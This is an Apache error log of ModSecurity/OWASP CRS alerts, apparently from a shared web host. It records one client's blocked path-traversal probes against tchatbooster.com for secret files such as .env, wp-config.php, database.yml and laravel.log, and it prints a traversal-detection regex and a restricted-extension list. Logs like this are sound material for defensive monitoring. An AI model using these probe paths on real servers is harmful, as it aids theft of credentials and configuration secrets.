[Tue May 12 04:39:49.633432 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS9QgpmE1yW0glLdgfZQAAANY"], referer: https://tchatbooster.com/js../../.env.production
[Tue May 12 04:39:49.633643 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS9QgpmE1yW0glLdgfZQAAANY"], referer: https://tchatbooster.com/js../../.env.production
[Tue May 12 04:39:50.110869 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9QgpmE1yW0glLdgfZQAAANY"], referer: https://tchatbooster.com/js../../.env.production
[Tue May 12 04:39:50.134000 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS9jue9Sp-pIv_Bb61nAAAAVQ"]
[Tue May 12 04:39:50.134094 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS9jue9Sp-pIv_Bb61nAAAAVQ"]
[Tue May 12 04:39:50.134255 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS9jue9Sp-pIv_Bb61nAAAAVQ"]
[Tue May 12 04:39:50.597426 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9jue9Sp-pIv_Bb61nAAAAVQ"]
[Tue May 12 04:39:50.615734 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:2388] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS9s1tk6y7yBJLpJop_wAAAIQ"], referer: https://tchatbooster.com/js../../wp-config.php
[Tue May 12 04:39:50.615970 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:2388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS9s1tk6y7yBJLpJop_wAAAIQ"], referer: https://tchatbooster.com/js../../wp-config.php
[Tue May 12 04:39:51.092724 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:2388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9s1tk6y7yBJLpJop_wAAAIQ"], referer: https://tchatbooster.com/js../../wp-config.php
[Tue May 12 04:39:51.121913 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS9zue9Sp-pIv_Bb61nwAAAVQ"]
[Tue May 12 04:39:51.122110 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS9zue9Sp-pIv_Bb61nwAAAVQ"]
[Tue May 12 04:39:51.576058 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9zue9Sp-pIv_Bb61nwAAAVQ"]
[Tue May 12 04:39:52.115408 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS-Due9Sp-pIv_Bb61pQAAAVQ"]
[Tue May 12 04:39:52.115558 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS-Due9Sp-pIv_Bb61pQAAAVQ"]
[Tue May 12 04:39:52.562275 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-Due9Sp-pIv_Bb61pQAAAVQ"]
[Tue May 12 04:39:52.620421 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKS-Due9Sp-pIv_Bb61pwAAAVQ"]
[Tue May 12 04:39:52.620697 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKS-Due9Sp-pIv_Bb61pwAAAVQ"]
[Tue May 12 04:39:53.079965 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-Due9Sp-pIv_Bb61pwAAAVQ"]
[Tue May 12 04:39:53.098104 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:2388] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKS-c1tk6y7yBJLpJoqAwAAAIQ"], referer: https://tchatbooster.com/storage/logs/laravel.log
[Tue May 12 04:39:53.098203 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS-Tue9Sp-pIv_Bb61qQAAAVQ"]
[Tue May 12 04:39:53.098397 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS-Tue9Sp-pIv_Bb61qQAAAVQ"]
[Tue May 12 04:39:53.098408 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:2388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKS-c1tk6y7yBJLpJoqAwAAAIQ"], referer: https://tchatbooster.com/storage/logs/laravel.log
[Tue May 12 04:39:53.549144 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-Tue9Sp-pIv_Bb61qQAAAVQ"]
[Tue May 12 04:39:53.591320 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:2388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-c1tk6y7yBJLpJoqAwAAAIQ"], referer: https://tchatbooster.com/storage/logs/laravel.log
[Tue May 12 04:39:53.613685 2026] [authz_core:error] [pid 1825287:tid 1825310] [client 216.73.216.110:44664] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/lang/error_log
[Tue May 12 04:39:54.070023 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS-jue9Sp-pIv_Bb61qgAAAVQ"]
[Tue May 12 04:39:54.070103 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS-jue9Sp-pIv_Bb61qgAAAVQ"]
[Tue May 12 04:39:54.070261 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS-jue9Sp-pIv_Bb61qgAAAVQ"]
[Tue May 12 04:39:54.504648 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-jue9Sp-pIv_Bb61qgAAAVQ"]
[Tue May 12 04:39:54.522829 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS-ggpmE1yW0glLdgfcgAAANY"], referer: https://tchatbooster.com/img../../.env
[Tue May 12 04:39:54.523044 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS-ggpmE1yW0glLdgfcgAAANY"], referer: https://tchatbooster.com/img../../.env
[Tue May 12 04:39:55.008656 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-ggpmE1yW0glLdgfcgAAANY"], referer: https://tchatbooster.com/img../../.env
[Tue May 12 04:39:55.034189 2026] [core:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 04:39:55.496247 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS-wgpmE1yW0glLdgfcwAAANY"], referer: https://tchatbooster.com/img../../../.env
[Tue May 12 04:39:55.496458 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS-wgpmE1yW0glLdgfcwAAANY"], referer: https://tchatbooster.com/img../../../.env
[Tue May 12 04:39:55.505333 2026] [authz_core:error] [pid 1730207:tid 1730227] [client 176.120.22.46:53744] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-supports/error_log, referer: https://www.maelbailly.fr/wp-includes/block-supports/
